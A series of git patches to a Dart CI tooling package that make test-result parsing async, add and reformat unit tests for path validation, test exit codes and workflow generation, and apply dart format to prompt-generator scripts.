event['message'] as String? ?? ''; - testPrints.putIfAbsent(id, () => StringBuffer()); - testPrints[id]!.writeln(message); - - case 'done': - results.parsed = true; - final time = event['time'] as int? ?? 0; - results.totalDurationMs = time; - } - } catch (e) { - malformedCount++; - if (malformedCount <= _maxMalformedWarnings) { - Logger.warn('Skipping malformed JSON line: $e'); - } else if (malformedCount == _maxMalformedWarnings + 1) { - Logger.warn('Skipping malformed JSON lines (circuit breaker — suppressing further warnings)'); + + case 'error': + results.parsed = true; + final id = event['testID'] as int?; + if (id == null) break; + testErrors.putIfAbsent(id, () => StringBuffer()); + if (testErrors[id]!.isNotEmpty) testErrors[id]!.write('\n---\n'); + testErrors[id]!.write(event['error'] as String? ?? ''); + testStackTraces.putIfAbsent(id, () => StringBuffer()); + if (testStackTraces[id]!.isNotEmpty) testStackTraces[id]!.write('\n---\n'); + testStackTraces[id]!.write(event['stackTrace'] as String? ?? ''); + + case 'print': + results.parsed = true; + final id = event['testID'] as int?; + if (id == null) break; + final message = event['message'] as String? ?? ''; + testPrints.putIfAbsent(id, () => StringBuffer()); + testPrints[id]!.writeln(message); + + case 'done': + results.parsed = true; + final time = event['time'] as int? ?? 0; + results.totalDurationMs = time; + } + } catch (e) { + malformedCount++; + if (malformedCount <= _maxMalformedWarnings) { + Logger.warn('Skipping malformed JSON line: $e'); + } else if (malformedCount == _maxMalformedWarnings + 1) { + Logger.warn('Skipping malformed JSON lines (circuit breaker — suppressing further warnings)'); + } } } + } on FileSystemException catch (e) { + Logger.warn('Failed reading JSON results file at $jsonPath: $e'); + return results; } if (malformedCount > _maxMalformedWarnings) { diff --git a/test/cli_utils_test.dart b/test/cli_utils_test.dart index 9727e86..bab5f1c 100644 --- a/test/cli_utils_test.dart +++ b/test/cli_utils_test.dart @@ -47,7 +47,10 @@ void main() { }); test('returns default path when TEST_LOG_DIR is unset', () { - final resolved = RepoUtils.resolveTestLogDir(repoRoot, environment: const {}); + final resolved = RepoUtils.resolveTestLogDir( + repoRoot, + environment: const {}, + ); expect(resolved, equals(p.join(repoRoot, '.dart_tool', 'test-logs'))); }); @@ -71,8 +74,10 @@ void main() { test('throws when TEST_LOG_DIR is relative', () { expect( - () => - RepoUtils.resolveTestLogDir(repoRoot, environment: const {'TEST_LOG_DIR': 'relative/path'}), + () => RepoUtils.resolveTestLogDir( + repoRoot, + environment: const {'TEST_LOG_DIR': 'relative/path'}, + ), throwsA(isA()), ); }); @@ -81,7 +86,10 @@ void main() { final runnerTemp = p.join(repoRoot, 'runner-temp'); final outside = p.join(repoRoot, 'outside', 'logs'); expect( - () => RepoUtils.resolveTestLogDir(repoRoot, environment: {'RUNNER_TEMP': runnerTemp, 'TEST_LOG_DIR': outside}), + () => RepoUtils.resolveTestLogDir( + repoRoot, + environment: {'RUNNER_TEMP': runnerTemp, 'TEST_LOG_DIR': outside}, + ), throwsA(isA()), ); }); @@ -101,7 +109,10 @@ void main() { expect( () => RepoUtils.resolveTestLogDir( repoRoot, - environment: {'RUNNER_TEMP': '/tmp/runner\nbad', 'TEST_LOG_DIR': inside}, + environment: { + 'RUNNER_TEMP': '/tmp/runner\nbad', + 'TEST_LOG_DIR': inside, + }, ), throwsA(isA()), ); @@ -141,19 +152,35 @@ void main() { expect(File(filePath).readAsStringSync(), equals('hello world')); }); - test('ensureSafeDirectory rejects symlink-backed directories', skip: !symlinksSupported, () { - final targetDir = Directory(p.join(tempDir.path, 'target'))..createSync(recursive: true); - final linkDirPath = p.join(tempDir.path, 'linked'); - Link(linkDirPath).createSync(targetDir.path); - expect(() => RepoUtils.ensureSafeDirectory(linkDirPath), throwsA(isA())); - }); - - test('writeFileSafely rejects symlink file targets', skip: !symlinksSupported, () { - final targetFile = File(p.join(tempDir.path, 'target.txt'))..writeAsStringSync('base'); - final linkPath = p.join(tempDir.path, 'linked.txt'); - Link(linkPath).createSync(targetFile.path); - expect(() => RepoUtils.writeFileSafely(linkPath, 'new content'), throwsA(isA())); - }); + test( + 'ensureSafeDirectory rejects symlink-backed directories', + skip: !symlinksSupported, + () { + final targetDir = Directory(p.join(tempDir.path, 'target')) + ..createSync(recursive: true); + final linkDirPath = p.join(tempDir.path, 'linked'); + Link(linkDirPath).createSync(targetDir.path); + expect( + () => RepoUtils.ensureSafeDirectory(linkDirPath), + throwsA(isA()), + ); + }, + ); + + test( + 'writeFileSafely rejects symlink file targets', + skip: !symlinksSupported, + () { + final targetFile = File(p.join(tempDir.path, 'target.txt')) + ..writeAsStringSync('base'); + final linkPath = p.join(tempDir.path, 'linked.txt'); + Link(linkPath).createSync(targetFile.path); + expect( + () => RepoUtils.writeFileSafely(linkPath, 'new content'), + throwsA(isA()), + ); + }, + ); }); group('TestResultsUtil.parseTestResultsJson', () { @@ -169,9 +196,9 @@ void main() { } }); - test('returns unparsed empty results when file does not exist', () { + test('returns unparsed empty results when file does not exist', () async { final missingPath = p.join(tempDir.path, 'missing.json'); - final results = TestResultsUtil.parseTestResultsJson(missingPath); + final results = await TestResultsUtil.parseTestResultsJson(missingPath); expect(results.parsed, isFalse); expect(results.passed, equals(0)); expect(results.failed, equals(0)); @@ -179,32 +206,10 @@ void main() { expect(results.failures, isEmpty); }); - test('returns unparsed results when NDJSON file is empty', () { + test('returns unparsed results when NDJSON file is empty', () async { final jsonPath = p.join(tempDir.path, 'empty.json'); File(jsonPath).writeAsStringSync(''); - final results = TestResultsUtil.parseTestResultsJson(jsonPath); - expect(results.parsed, isFalse); - expect(results.passed, equals(0)); - expect(results.failed, equals(0)); - expect(results.skipped, equals(0)); - expect(results.failures, isEmpty); - }); - - test('returns unparsed results when NDJSON file has only blank lines', () { - final jsonPath = p.join(tempDir.path, 'blank.json'); - File(jsonPath).writeAsStringSync('\n \n\t\n'); - final results = TestResultsUtil.parseTestResultsJson(jsonPath); - expect(results.parsed, isFalse); - expect(results.passed, equals(0)); - expect(results.failed, equals(0)); - expect(results.skipped, equals(0)); - expect(results.failures, isEmpty); - }); - - test('returns unparsed results when file has valid JSON but no structured events', () { - final jsonPath = p.join(tempDir.path, 'no_events.json'); - File(jsonPath).writeAsStringSync('{"type":"unknown","data":1}\n{"other":"value"}\n'); - final results = TestResultsUtil.parseTestResultsJson(jsonPath); + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); expect(results.parsed, isFalse); expect(results.passed, equals(0)); expect(results.failed, equals(0)); @@ -212,7 +217,37 @@ void main() { expect(results.failures, isEmpty); }); - test('parses pass/fail/skipped counts and failure details', () { + test( + 'returns unparsed results when NDJSON file has only blank lines', + () async { + final jsonPath = p.join(tempDir.path, 'blank.json'); + File(jsonPath).writeAsStringSync('\n \n\t\n'); + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); + expect(results.parsed, isFalse); + expect(results.passed, equals(0)); + expect(results.failed, equals(0)); + expect(results.skipped, equals(0)); + expect(results.failures, isEmpty); + }, + ); + + test( + 'returns unparsed results when file has valid JSON but no structured events', + () async { + final jsonPath = p.join(tempDir.path, 'no_events.json'); + File( + jsonPath, + ).writeAsStringSync('{"type":"unknown","data":1}\n{"other":"value"}\n'); + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); + expect(results.parsed, isFalse); + expect(results.passed, equals(0)); + expect(results.failed, equals(0)); + expect(results.skipped, equals(0)); + expect(results.failures, isEmpty); + }, + ); + + test('parses pass/fail/skipped counts and failure details', () async { final jsonPath = p.join(tempDir.path, 'results.json'); File(jsonPath).writeAsStringSync( [ @@ -228,7 +263,7 @@ void main() { ].join('\n'), ); - final results = TestResultsUtil.parseTestResultsJson(jsonPath); + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); expect(results.parsed, isTrue); expect(results.passed, equals(1)); expect(results.failed, equals(1)); @@ -242,7 +277,7 @@ void main() { expect(results.failures.first.durationMs, equals(40)); }); - test('caps failures list at 50 to prevent unbounded growth', () { + test('caps failures list at 50 to prevent unbounded growth', () async { final lines = []; for (var i = 0; i < 60; i++) { lines.addAll([ @@ -254,12 +289,12 @@ void main() { final jsonPath = p.join(tempDir.path, 'many_failures.json'); File(jsonPath).writeAsStringSync(lines.join('\n')); - final results = TestResultsUtil.parseTestResultsJson(jsonPath); + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); expect(results.failed, equals(60)); expect(results.failures.length, lessThanOrEqualTo(50)); }); - test('counts testDone with result \"error\" as a failure', () { + test('counts testDone with result \"error\" as a failure', () async { final jsonPath = p.join(tempDir.path, 'error_result.json'); File(jsonPath).writeAsStringSync( [ @@ -270,14 +305,14 @@ void main() { ].join('\n'), ); - final results = TestResultsUtil.parseTestResultsJson(jsonPath); + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); expect(results.parsed, isTrue); expect(results.failed, equals(1)); expect(results.failures, hasLength(1)); expect(results.failures.first.name, equals('errored')); }); - test('ignores malformed JSON lines and hidden test entries', () { + test('ignores malformed JSON lines and hidden test entries', () async { final jsonPath = p.join(tempDir.path, 'results.json'); File(jsonPath).writeAsStringSync( [ @@ -291,14 +326,14 @@ void main() { ].join('\n'), ); - final results = TestResultsUtil.parseTestResultsJson(jsonPath); + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); expect(results.parsed, isTrue); expect(results.passed, equals(1)); expect(results.failed, equals(0)); expect(results.failures, isEmpty); }); - test('malformed JSON circuit breaker limits warning flood', () { + test('malformed JSON circuit breaker limits warning flood', () async { final jsonPath = p.join(tempDir.path, 'flood.json'); final lines = [ '{"type":"testStart","test":{"id":1,"name":"ok"},"time":0}', @@ -308,12 +343,12 @@ void main() { ]; File(jsonPath).writeAsStringSync(lines.join('\n')); - final results = TestResultsUtil.parseTestResultsJson(jsonPath); + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); expect(results.parsed, isTrue); expect(results.passed, equals(1)); }); - test('truncates stored failure details to prevent unbounded growth', () { + test('truncates stored failure details to prevent unbounded growth', () async { final longError = 'x' * 12000; final longStack = 'y' * 10000; final longPrint = 'z' * 8000; @@ -328,7 +363,7 @@ void main() { ].join('\n'), ); - final results = TestResultsUtil.parseTestResultsJson(jsonPath); + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); expect(results.failures, hasLength(1)); expect(results.failures.first.error.length, lessThan(10000)); expect(results.failures.first.error, contains('(truncated)')); @@ -340,7 +375,12 @@ void main() { }); group('TestResultsUtil.writeTestJobSummary', () { - TestResults _parsed({required int passed, required int failed, required int skipped, int durationMs = 500}) { + TestResults _parsed({ + required int passed, + required int failed, + required int skipped, + int durationMs = 500, + }) { final results = TestResults() ..parsed = true ..passed = passed @@ -350,39 +390,50 @@ void main() { return results; } - test('emits NOTE when parsed results are successful and exit code is 0', () { - String? summary; - final results = _parsed(passed: 3, failed: 0, skipped: 1); - - TestResultsUtil.writeTestJobSummary( - results, - 0, - platformId: 'linux-x64', - writeSummary: (markdown) => summary = markdown, - ); - - expect(summary, isNotNull); - expect(summary!, contains('## Test Results — linux-x64')); - expect(summary!, contains('> [!NOTE]')); - expect(summary!, contains('All 4 tests passed')); - }); - - test('emits CAUTION when exit code is non-zero even if failed count is zero', () { - String? summary; - final results = _parsed(passed: 2, failed: 0, skipped: 0); + test( + 'emits NOTE when parsed results are successful and exit code is 0', + () { + String? summary; + final results = _parsed(passed: 3, failed: 0, skipped: 1); + + TestResultsUtil.writeTestJobSummary( + results, + 0, + platformId: 'linux-x64', + writeSummary: (markdown) => summary = markdown, + ); - TestResultsUtil.writeTestJobSummary( - results, - 1, - platformId: 'linux ', - writeSummary: (markdown) => summary = markdown, - ); + expect(summary, isNotNull); + expect(summary!, contains('## Test Results — linux-x64')); + expect(summary!, contains('> [!NOTE]')); + expect(summary!, contains('All 4 tests passed')); + }, + ); + + test( + 'emits CAUTION when exit code is non-zero even if failed count is zero', + () { + String? summary; + final results = _parsed(passed: 2, failed: 0, skipped: 0); + + TestResultsUtil.writeTestJobSummary( + results, + 1, + platformId: 'linux ', + writeSummary: (markdown) => summary = markdown, + ); - expect(summary, isNotNull); - expect(summary!, contains('## Test Results — linux <x64>')); - expect(summary!, contains('> [!CAUTION]')); - expect(summary!, contains('Tests exited with code 1 despite no structured test failures.')); - }); + expect(summary, isNotNull); + expect(summary!, contains('## Test Results — linux <x64>')); + expect(summary!, contains('> [!CAUTION]')); + expect( + summary!, + contains( + 'Tests exited with code 1 despite no structured test failures.', + ), + ); + }, + ); test('emits CAUTION for unparsed results with non-zero exit code', () { String? summary; @@ -397,7 +448,12 @@ void main() { expect(summary, isNotNull); expect(summary!, contains('> [!CAUTION]')); - expect(summary!, contains('Tests failed (exit code 7) — no structured results available.')); + expect( + summary!, + contains( + 'Tests failed (exit code 7) — no structured results available.', + ), + ); }); test('emits NOTE for unparsed results with zero exit code', () { @@ -413,14 +469,25 @@ void main() { expect(summary, isNotNull); expect(summary!, contains('> [!NOTE]')); - expect(summary!, contains('Tests passed (exit code 0) — no structured results available.')); + expect( + summary!, + contains( + 'Tests passed (exit code 0) — no structured results available.', + ), + ); }); test('emits CAUTION when parsed results contain failures', () { String? summary; final results = _parsed(passed: 1, failed: 1, skipped: 0); results.failures.add( - TestFailure(name: 'failing test', error: 'boom', stackTrace: 'trace', printOutput: '', durationMs: 12), + TestFailure( + name: 'failing test', + error: 'boom', + stackTrace: 'trace', + printOutput: '', + durationMs: 12, + ), ); TestResultsUtil.writeTestJobSummary( @@ -460,7 +527,12 @@ void main() { ); expect(summary, isNotNull); - expect(summary!, contains('_...and 5 more failures. See test logs artifact for full details._')); + expect( + summary!, + contains( + '_...and 5 more failures. See test logs artifact for full details._', + ), + ); expect(summary!, isNot(contains('failing test 24'))); }); @@ -520,7 +592,10 @@ void main() { group('Utf8BoundedBuffer', () { test('appends full content when under byte limit', () { - final buffer = Utf8BoundedBuffer(maxBytes: 20, truncationSuffix: '...[truncated]'); + final buffer = Utf8BoundedBuffer( + maxBytes: 20, + truncationSuffix: '...[truncated]', + ); buffer.append('hello'); buffer.append(' world'); expect(buffer.isTruncated, isFalse); @@ -537,12 +612,18 @@ void main() { expect(buffer.byteLength, equals(9)); }); - test('never exceeds maxBytes even when suffix is longer than remaining budget', () { - final buffer = Utf8BoundedBuffer(maxBytes: 4, truncationSuffix: '...[truncated]'); - buffer.append('abcdefgh'); - expect(buffer.isTruncated, isTrue); - expect(utf8.encode(buffer.toString()).length, lessThanOrEqualTo(4)); - }); + test( + 'never exceeds maxBytes even when suffix is longer than remaining budget', + () { + final buffer = Utf8BoundedBuffer( + maxBytes: 4, + truncationSuffix: '...[truncated]', + ); + buffer.append('abcdefgh'); + expect(buffer.isTruncated, isTrue); + expect(utf8.encode(buffer.toString()).length, lessThanOrEqualTo(4)); + }, + ); }); group('StepSummary', () { @@ -559,7 +640,10 @@ void main() { File(summaryPath).writeAsStringSync('x' * (maxBytes - 2)); expect(File(summaryPath).lengthSync(), equals(maxBytes - 2)); - StepSummary.write('語', environment: {'GITHUB_STEP_SUMMARY': summaryPath}); + StepSummary.write( + '語', + environment: {'GITHUB_STEP_SUMMARY': summaryPath}, + ); // Should skip append (would exceed); file size unchanged expect(File(summaryPath).lengthSync(), equals(maxBytes - 2)); } finally { @@ -595,7 +679,9 @@ void main() { void _writeConfig(Map ci) { final configDir = Directory('${tempDir.path}/.runtime_ci')..createSync(); - File('${configDir.path}/config.json').writeAsStringSync(json.encode({'ci': ci})); + File( + '${configDir.path}/config.json', + ).writeAsStringSync(json.encode({'ci': ci})); } test('returns empty when no sub_packages', () { @@ -685,35 +771,55 @@ void main() { }); group('CiProcessRunner.exec', () { - test('fatal path exits with process exit code after flushing stdout/stderr', () async { - final scriptPath = p.join(p.current, 'test', 'scripts', 'fatal_exit_probe.dart'); - final result = Process.runSync(Platform.resolvedExecutable, ['run', scriptPath], runInShell: false); - final expectedCode = Platform.isWindows ? 7 : 1; - expect(result.exitCode, equals(expectedCode), reason: 'fatal exec should exit with failing command exit code'); - }); + test( + 'fatal path exits with process exit code after flushing stdout/stderr', + () async { + final scriptPath = p.join( + p.current, + 'test', + 'scripts', + 'fatal_exit_probe.dart', + ); + final result = Process.runSync(Platform.resolvedExecutable, [ + 'run', + scriptPath, + ], runInShell: false); + final expectedCode = Platform.isWindows ? 7 : 1; + expect( + result.exitCode, + equals(expectedCode), + reason: 'fatal exec should exit with failing command exit code', + ); + }, + ); }); group('CiProcessRunner.runWithTimeout', () { test('completes normally when process finishes within timeout', () async { - final result = await CiProcessRunner.runWithTimeout(Platform.resolvedExecutable, [ - '--version', - ], timeout: const Duration(seconds: 10)); + final result = await CiProcessRunner.runWithTimeout( + Platform.resolvedExecutable, + ['--version'], + timeout: const Duration(seconds: 10), + ); expect(result.exitCode, equals(0)); expect(result.stdout, contains('Dart')); }); - test('returns timeout result and kills process when timeout exceeded', () async { - final executable = Platform.isWindows ? 'ping' : 'sleep'; - final args = Platform.isWindows ? ['127.0.0.1', '-n', '60'] : ['60']; - final result = await CiProcessRunner.runWithTimeout( - executable, - args, - timeout: const Duration(milliseconds: 500), - timeoutExitCode: 124, - timeoutMessage: 'Timed out', - ); - expect(result.exitCode, equals(124)); - expect(result.stderr, equals('Timed out')); - }); + test( + 'returns timeout result and kills process when timeout exceeded', + () async { + final executable = Platform.isWindows ? 'ping' : 'sleep'; + final args = Platform.isWindows ? ['127.0.0.1', '-n', '60'] : ['60']; + final result = await CiProcessRunner.runWithTimeout( + executable, + args, + timeout: const Duration(milliseconds: 500), + timeoutExitCode: 124, + timeoutMessage: 'Timed out', + ); + expect(result.exitCode, equals(124)); + expect(result.stderr, equals('Timed out')); + }, + ); }); } diff --git a/test/test_command_test.dart b/test/test_command_test.dart index 9a0ab1c..eb50d93 100644 --- a/test/test_command_test.dart +++ b/test/test_command_test.dart @@ -1,4 +1,5 @@ import 'dart:io'; +import 'dart:convert'; import 'package:path/path.dart' as p; import 'package:test/test.dart'; @@ -7,6 +8,15 @@ import 'package:runtime_ci_tooling/src/cli/commands/test_command.dart'; import 'package:runtime_ci_tooling/src/cli/utils/test_results_util.dart'; import 'package:runtime_ci_tooling/src/triage/utils/config.dart'; +class _TestExit implements Exception { + final int code; + _TestExit(this.code); +} + +Future _throwingExit(int code) async { + throw _TestExit(code); +} + void main() { group('TestCommand.runWithRoot', () { late Directory tempDir; @@ -21,18 +31,42 @@ void main() { } }); - test('skips root tests and succeeds when no test/ directory exists', () async { - // Minimal repo: pubspec with matching name, no test/ - File(p.join(tempDir.path, 'pubspec.yaml')).writeAsStringSync('name: ${config.repoName}\nversion: 0.0.0\n'); - - // Completes without throwing or exit(1); StepSummary.write is no-op when - // GITHUB_STEP_SUMMARY is unset (local runs). - await TestCommand.runWithRoot(tempDir.path); - }); + void writeRootPubspec({bool includeTest = false}) { + final deps = includeTest ? 'dev_dependencies:\n test: ^1.24.0\n' : ''; + File(p.join(tempDir.path, 'pubspec.yaml')).writeAsStringSync( + 'name: ${config.repoName}\nversion: 0.0.0\nenvironment:\n sdk: ^3.0.0\n$deps', + ); + } + + void writeSubPackageConfig(List> subPackages) { + final configDir = Directory(p.join(tempDir.path, '.runtime_ci')) + ..createSync(recursive: true); + File(p.join(configDir.path, 'config.json')).writeAsStringSync( + jsonEncode({ + 'ci': { + 'dart_sdk': '3.9.2', + 'features': {'proto': false, 'lfs': false}, + 'sub_packages': subPackages, + }, + }), + ); + } + + test( + 'skips root tests and succeeds when no test/ directory exists', + () async { + // Minimal repo: pubspec with matching name, no test/ + writeRootPubspec(); + + // Completes without throwing or exit(1); StepSummary.write is no-op when + // GITHUB_STEP_SUMMARY is unset (local runs). + await TestCommand.runWithRoot(tempDir.path); + }, + ); test('uses passed repoRoot for log directory resolution', () async { // Create minimal repo - File(p.join(tempDir.path, 'pubspec.yaml')).writeAsStringSync('name: ${config.repoName}\nversion: 0.0.0\n'); + writeRootPubspec(); await TestCommand.runWithRoot(tempDir.path); @@ -41,57 +75,145 @@ void main() { expect(Directory(expectedLogDir).existsSync(), isTrue); }); - test('runs root tests, writes results.json, and StepSummary pathway produces valid output', () async { - // Minimal repo with a passing test to exercise full TestCommand flow - File(p.join(tempDir.path, 'pubspec.yaml')).writeAsStringSync(''' -name: ${config.repoName} + test( + 'runs root tests, writes results.json, and StepSummary pathway produces valid output', + () async { + // Minimal repo with a passing test to exercise full TestCommand flow + writeRootPubspec(includeTest: true); + Directory(p.join(tempDir.path, 'test')).createSync(recursive: true); + File( + p.join(tempDir.path, 'test', 'passing_test.dart'), + ).writeAsStringSync(''' +import 'package:test/test.dart'; + +void main() { + test('passes', () => expect(1 + 1, equals(2))); +} +'''); + // Resolve dependencies so dart test can run + final pubGet = await Process.run('dart', [ + 'pub', + 'get', + ], workingDirectory: tempDir.path); + expect(pubGet.exitCode, equals(0), reason: 'dart pub get must succeed'); + + await TestCommand.runWithRoot(tempDir.path); + + final logDir = p.join(tempDir.path, '.dart_tool', 'test-logs'); + expect( + Directory(logDir).existsSync(), + isTrue, + reason: 'log dir should be created', + ); + + // results.json or expanded.txt are written by file reporters + final jsonPath = p.join(logDir, 'results.json'); + final expandedPath = p.join(logDir, 'expanded.txt'); + final hasResults = + File(jsonPath).existsSync() || File(expandedPath).existsSync(); + expect( + hasResults, + isTrue, + reason: 'at least one reporter output should exist', + ); + + // If results.json exists, verify parse + writeTestJobSummary pathway + if (File(jsonPath).existsSync()) { + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); + expect(results.parsed, isTrue); + expect(results.passed, greaterThanOrEqualTo(1)); + expect(results.failed, equals(0)); + + String? capturedSummary; + TestResultsUtil.writeTestJobSummary( + results, + 0, + platformId: 'test-runner', + writeSummary: (m) => capturedSummary = m, + ); + expect(capturedSummary, isNotNull); + expect(capturedSummary!, contains('## Test Results — test-runner')); + expect(capturedSummary!, contains('passed')); + } + }, + ); + + test('exits with code 1 when root tests fail', () async { + writeRootPubspec(includeTest: true); + Directory(p.join(tempDir.path, 'test')).createSync(recursive: true); + File(p.join(tempDir.path, 'test', 'failing_test.dart')).writeAsStringSync( + ''' +import 'package:test/test.dart'; + +void main() { + test('fails', () => expect(1, equals(2))); +} +''', + ); + + final pubGet = await Process.run('dart', [ + 'pub', + 'get', + ], workingDirectory: tempDir.path); + expect(pubGet.exitCode, equals(0), reason: 'dart pub get must succeed'); + + await expectLater( + () => TestCommand.runWithRoot(tempDir.path, exitHandler: _throwingExit), + throwsA(isA<_TestExit>().having((e) => e.code, 'code', 1)), + ); + }); + + test( + 'exits when configured sub-package directory has no pubspec.yaml', + () async { + writeRootPubspec(); + writeSubPackageConfig([ + {'name': 'pkg_a', 'path': 'packages/pkg_a'}, + ]); + Directory( + p.join(tempDir.path, 'packages', 'pkg_a'), + ).createSync(recursive: true); + + await expectLater( + () => + TestCommand.runWithRoot(tempDir.path, exitHandler: _throwingExit), + throwsA(isA<_TestExit>().having((e) => e.code, 'code', 1)), + ); + }, + ); + + test('exits when sub-package pub get times out', () async { + writeRootPubspec(); + writeSubPackageConfig([ + {'name': 'pkg_timeout', 'path': 'packages/pkg_timeout'}, + ]); + final pkgDir = Directory(p.join(tempDir.path, 'packages', 'pkg_timeout')) + ..createSync(recursive: true); + File(p.join(pkgDir.path, 'pubspec.yaml')).writeAsStringSync(''' +name: pkg_timeout version: 0.0.0 environment: sdk: ^3.0.0 dev_dependencies: test: ^1.24.0 '''); - Directory(p.join(tempDir.path, 'test')).createSync(recursive: true); - File(p.join(tempDir.path, 'test', 'passing_test.dart')).writeAsStringSync(''' + Directory(p.join(pkgDir.path, 'test')).createSync(recursive: true); + File(p.join(pkgDir.path, 'test', 'noop_test.dart')).writeAsStringSync(''' import 'package:test/test.dart'; void main() { - test('passes', () => expect(1 + 1, equals(2))); + test('noop', () => expect(true, isTrue)); } '''); - // Resolve dependencies so dart test can run - final pubGet = await Process.run('dart', ['pub', 'get'], workingDirectory: tempDir.path); - expect(pubGet.exitCode, equals(0), reason: 'dart pub get must succeed'); - await TestCommand.runWithRoot(tempDir.path); - - final logDir = p.join(tempDir.path, '.dart_tool', 'test-logs'); - expect(Directory(logDir).existsSync(), isTrue, reason: 'log dir should be created'); - - // results.json or expanded.txt are written by file reporters - final jsonPath = p.join(logDir, 'results.json'); - final expandedPath = p.join(logDir, 'expanded.txt'); - final hasResults = File(jsonPath).existsSync() || File(expandedPath).existsSync(); - expect(hasResults, isTrue, reason: 'at least one reporter output should exist'); - - // If results.json exists, verify parse + writeTestJobSummary pathway - if (File(jsonPath).existsSync()) { - final results = TestResultsUtil.parseTestResultsJson(jsonPath); - expect(results.parsed, isTrue); - expect(results.passed, greaterThanOrEqualTo(1)); - expect(results.failed, equals(0)); - - String? capturedSummary; - TestResultsUtil.writeTestJobSummary( - results, - 0, - platformId: 'test-runner', - writeSummary: (m) => capturedSummary = m, - ); - expect(capturedSummary, isNotNull); - expect(capturedSummary!, contains('## Test Results — test-runner')); - expect(capturedSummary!, contains('passed')); - } + await expectLater( + () => TestCommand.runWithRoot( + tempDir.path, + pubGetTimeout: Duration.zero, + exitHandler: _throwingExit, + ), + throwsA(isA<_TestExit>().having((e) => e.code, 'code', 1)), + ); }); }); } From b7116486be19a5528169fb83baf84f5e0ad90d09 Mon Sep 17 00:00:00 2001 From: Tsavo Knott Date: Tue, 24 Feb 2026 22:34:28 -0500 Subject: [PATCH 15/16] test: broaden workflow generator validation assertions Expand workflow generator coverage for new validation and render behaviors, including retention-days configuration, GH_PAT env indirection, single-platform IDs, and user-section preservation edge cases. --- test/workflow_generator_test.dart | 37 +++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) diff --git a/test/workflow_generator_test.dart b/test/workflow_generator_test.dart index f91f04c..0f60482 100644 --- a/test/workflow_generator_test.dart +++ b/test/workflow_generator_test.dart @@ -31,6 +31,19 @@ Map _validConfig({ }; } +String _readToolingVersionFromPubspec() { + final pubspec = File('pubspec.yaml'); + if (!pubspec.existsSync()) { + throw StateError('pubspec.yaml not found in current working directory'); + } + final content = pubspec.readAsStringSync(); + final match = RegExp(r'^version:\s*([^\s]+)\s*$', multiLine: true).firstMatch(content); + if (match == null) { + throw StateError('Could not parse version from pubspec.yaml'); + } + return match.group(1)!; +} + void main() { // =========================================================================== // P0: validate() tests @@ -1372,6 +1385,30 @@ void main() { expect('${firstStep['uses']}', contains('actions/checkout')); }); + test('rendered workflow stays in sync with committed .github/workflows/ci.yaml', () { + final ciConfig = WorkflowGenerator.loadCiConfig(Directory.current.path); + expect(ciConfig, isNotNull, reason: 'Repository CI config must be present'); + + final goldenPath = '.github/workflows/ci.yaml'; + final goldenFile = File(goldenPath); + expect(goldenFile.existsSync(), isTrue, reason: 'Committed workflow golden must exist'); + + final existingContent = goldenFile.readAsStringSync(); + final toolingVersion = _readToolingVersionFromPubspec(); + final rendered = WorkflowGenerator( + ciConfig: ciConfig!, + toolingVersion: toolingVersion, + ).render(existingContent: existingContent); + + String normalize(String input) => '${input.replaceAll('\r\n', '\n').trimRight()}\n'; + + expect( + normalize(rendered), + equals(normalize(existingContent)), + reason: 'Generated workflow drifted from committed file. Re-run workflow generation and commit updated output.', + ); + }); + test('managed_test: upload step uses success() || failure() not cancelled', () { final gen = WorkflowGenerator( ciConfig: _minimalValidConfig(featureOverrides: {'managed_test': true}), From dcae6c2147822a2ca97d4224848c0486b5ee5f3d Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Wed, 25 Feb 2026 04:27:54 +0000 Subject: [PATCH 16/16] bot(format): apply dart format --line-length 120 [skip ci] --- .../prompts/autodoc_api_reference_prompt.dart | 10 +- scripts/prompts/autodoc_examples_prompt.dart | 29 +- scripts/prompts/autodoc_migration_prompt.dart | 24 +- .../prompts/autodoc_quickstart_prompt.dart | 22 +- test/cli_utils_test.dart | 318 ++++++------------ test/test_command_test.dart | 167 ++++----- 6 files changed, 189 insertions(+), 381 deletions(-) diff --git a/scripts/prompts/autodoc_api_reference_prompt.dart b/scripts/prompts/autodoc_api_reference_prompt.dart index c044b4e..a0d1bfe 100644 --- a/scripts/prompts/autodoc_api_reference_prompt.dart +++ b/scripts/prompts/autodoc_api_reference_prompt.dart @@ -9,9 +9,7 @@ import 'dart:io'; void main(List args) { if (args.length < 2) { - stderr.writeln( - 'Usage: autodoc_api_reference_prompt.dart [lib_dir]', - ); + stderr.writeln('Usage: autodoc_api_reference_prompt.dart [lib_dir]'); exit(1); } @@ -78,11 +76,7 @@ Generate the complete API_REFERENCE.md content. String _runSync(String command) { try { - final result = Process.runSync( - 'sh', - ['-c', command], - workingDirectory: Directory.current.path, - ); + final result = Process.runSync('sh', ['-c', command], workingDirectory: Directory.current.path); if (result.exitCode == 0) return (result.stdout as String).trim(); return ''; } catch (_) { diff --git a/scripts/prompts/autodoc_examples_prompt.dart b/scripts/prompts/autodoc_examples_prompt.dart index 39e8e22..6509399 100644 --- a/scripts/prompts/autodoc_examples_prompt.dart +++ b/scripts/prompts/autodoc_examples_prompt.dart @@ -9,9 +9,7 @@ import 'dart:io'; void main(List args) { if (args.length < 2) { - stderr.writeln( - 'Usage: autodoc_examples_prompt.dart [lib_dir]', - ); + stderr.writeln('Usage: autodoc_examples_prompt.dart [lib_dir]'); exit(1); } @@ -19,30 +17,19 @@ void main(List args) { final sourceDir = args[1]; final libDir = args.length > 2 ? args[2] : ''; - final classes = _runSync( - 'grep -rn "^class\\|^abstract class\\|^mixin" $sourceDir 2>/dev/null | head -30', - ); + final classes = _runSync('grep -rn "^class\\|^abstract class\\|^mixin" $sourceDir 2>/dev/null | head -30'); final methods = _runSync( 'grep -rn "Future<\\|Stream<\\|void " $sourceDir 2>/dev/null | grep -v "^\\/\\/" | head -30', ); - final enums = _runSync( - 'grep -rn "^enum" $sourceDir 2>/dev/null', - ); + final enums = _runSync('grep -rn "^enum" $sourceDir 2>/dev/null'); String testContent = 